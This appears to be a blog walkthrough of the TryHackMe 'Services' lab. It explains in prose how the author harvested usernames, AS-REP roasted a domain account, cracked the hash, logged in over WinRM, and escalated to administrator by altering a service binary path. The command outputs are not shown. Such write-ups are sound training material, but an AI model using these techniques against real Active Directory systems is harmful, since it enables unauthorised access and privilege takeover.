Walkthrough Services (TryHackMe)
Services is an intermediate level room in THM that covers fairly common Active Directory attack paths to gain initial access to the system. From there, as you may have guessed, insecure service privileges are used to escalate our privileges to administrator. My goal for this post is not only to list the steps I took to eventually root this system, but also to explain my reasoning behind what I did. Let’s get started!
We’ll start with a port scan of the machine to see what services are running and try to determine what environment we’re dealing with. I always start by scanning the top 1000 ports (this is the default if you don’t use the “-p” switch to specify a port range) and add the -sV (to count service versions) and sC (to run default scripts against certain services) switches. Here is what we get:
We can tell it’s a Windows box because of the open ports (135, 139, 445, 88, 389 — the common ports on Windows machines). We can also immediately determine that this is a domain controller (DC), which means we are dealing with an Active Directory environment. This is an important distinction to make when trying to figure out which attack paths we should pursue.
Note: The domain controller will run services that standard servers or desktops will not, such as DNS (53), Kerberos (88), and LDAP (389).
Before we dive into naming some of these services, I’d like to mention that I always run a full port scan (with the “-p-” switch) after my initial scan to make sure we’re not missing any ports, to speed up the scanning process I use the -T4,(the -T flag is used to specify the timing template, which controls the speed at which Nmap performs scans. The timing templates range from -T0 (the slowest and most stealthy) to -T5 (the fastest but least stealthy).
Here’s what it revealed:
The only additional port I want to highlight is 5985. This shows that Windows Remote Management (WinRM) is enabled. We’ll come back to this later once we get a set of valid credentials.
NOTE: It’s important to understand that this port (5985) will not show up in a scan of only the top 1000 ports (nmap’s default scan). This service is very common in Windows environments and very valuable to attackers, so it should not be overlooked!
Okay, so here’s what I want to start enumerating based on our scan results:
There are many people who do not know the wonderful netexec tool
I will briefly explain to you what the tool is (it is a tool often associated with network penetration testing and cyber security. It is usually used to execute commands on remote systems over a network, often leveraging security holes or exploiting remote services to obtain command execution capabilities.) I wrote a more detailed explanation of the tool I wrote a post comparing netexec to crackmapexec and how powerful the tool is for gathering information
HTTP — web servers can always be a viable path into a network and may also expose sensitive information (as we’ll soon find out!).
Before we get too crazy with our enumeration, I always like to browse the site to get an overall feel for the purpose of the web app, where potential vulnerabilities may exist, and if any sensitive information may be exposed. Here’s what sticks out to me:
This site not only reveals the format of their emails (first_initial.last_name), but it also gives us a list of employee names that allows us to create a list of possible usernames! The value of this cannot be overstated. With a list of valid usernames, we can try password spraying attacks and most importantly we can try an AS-REP grilling attack (more on that in a second).
- This is useful for user account/password brute force guessing and username enumeration when usernames are based on the users’ names.
- I am attaching the link to the tool
Based on this information, I don’t feel the need to name the web server anymore because I want to try to go through a typical AD attack path first (if that doesn’t work, we can always fall back to the web server). So I add the following usernames to a file called users.txt to prepare for this attack:
Without a valid set of credentials, we’re kind of limited as to what we’re able to do. Kerberoasting, querying LDAP, accessing RDP, etc. are all out of the picture for now.
But because Kerberos is the default authentication mechanism in Active Directory, we have one viable option to gain access to this box: AS-REP Roasting! Let me briefly explain what this is…
To access a resource in AD, a user must first request a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC) which resides on the DC. Normally, this request (called an Authentication Service Request or AS-REQ) will contain a timestamp that the user encrypted with their NT hash. Once the KDC receives this encrypted timestamp, it attempts to decrypt the timestamp with that users NT hash (which it also has access to — the DC keeps a copy of every users hashed password). If the KDC was able to successfully decrypt the hash, it will issue a TGT to the user (this step is called the Authentication Service Response or AS-REP).
All of that sounds relatively secure, but here’s where things can get crazy. It’s possible to disable this “preauthentication” (the step where the user has to encrypt a timestamp to prove their identity). If this is done, then the user is able to request a TGT without having to provide an encrypted timestamp to verify that they are who they are.
Here’s what this means: if a users account doesn’t require preauthentication, we can request a TGT on their behalf even without knowing their password, and once we receive that TGT we can crack it offline to reveal their password! Let’s give it a shot!
the tool for this is impacket-GetNPUsers. There are just two prerequisites to use this tool:
- step 1: We need a list of valid usernames (which we already created — users.txt).
- Step 2: We need to add the domain name (services.local) to our /etc/hosts file and have it point to the DC:
- 10.10.101.161 services.local
With those two steps complete, let’s attempt some AS-REP roasting:
Boom! User j.rock has preauth disabled, which means we were able to grab his account hash that we can crack using hashcat:
Now we have a set of valid credentials, but where can we use them? Based off our port scan we have three main options for remote access:
Connect via psexec over SMB (can’t do this because j.rock isn’t an admin)
RDP (must be part of the Remote Desktop Users group, which we aren’t)
WinRM (must be part of the Remote Management Users group, which we are!)
I tried the first two options and was unsuccessful (for the reasons listed above), but was able to connect using WinRM (remember port 5985?) with a tool called evil-winrm:
What this gives us is a remote PowerShell session on the Domain Controller. Now we’ll just grab the user flag and move onto some privilege escalation!
privilege escalation:
One of the first steps I take when I get a shell on a system is to look at what groups the user belongs to and what privileges they already have:
Running “whoami /all” reveals that j.rock is a member of the “server operators” group. Members of this group have the ability to start and stop services. This is a hint as to which way this privilege escalation is going to take.
In my experience, one of the reasons we will need to stop and start a service is after we change the binary path of the service. The binary path of a service is the executable (or command) it will run when the service starts. If we can change a services binary path we can make it execute a malicious payload or command of our choice. Let’s see if it will work.
evil-winrm has a built in command called “services” that we can run to show us available services and whether or not our account has the required privileges to access them:
Based on this output, let’s see if we can modify the binary path of the first service in the list (ADWS).
ADWS - stands for Active Directory Web Services. It is a Windows service that enables web-based management of Active Directory (AD) using various remote management tools. ADWS provides a web service interface for managing directory services, making it easy to perform remote management tasks without relying on traditional management consoles such as the Active Directory Users and Computers (ADUC) tool.
Our goal will be to add j.rock to the Administrators group so we can grab the root flag. If we can successfully run the first command, we’ll follow that up by stopping and starting the service (remember, the command won’t run until the service is restarted).
Success! We’ll log out and log back in as j.rock and verify our new group membership:
Now our user is a member of the Administrators group, we can change the password for the administrator group user
and do everything we set our minds to
I decided to connect via RDP with the administrator user to capture the last flag root.flag
Since this is my first writing in Medium, I decided to take it a step further, since I am planned for certifications such as CRTP, OSCP
Every machine that is related to the world of AD I will post my ways to deal with it and solutions and what tools I used, I built myself some methods of attack and access to machines in the AD environment, I hope I will be able to give you inspiration and ways to deal with machines that are related to the AD environment, thank you for reading and stay tuned for more articles and articles
Ahhh and don’t forget to follow me ;)
See you in the next article
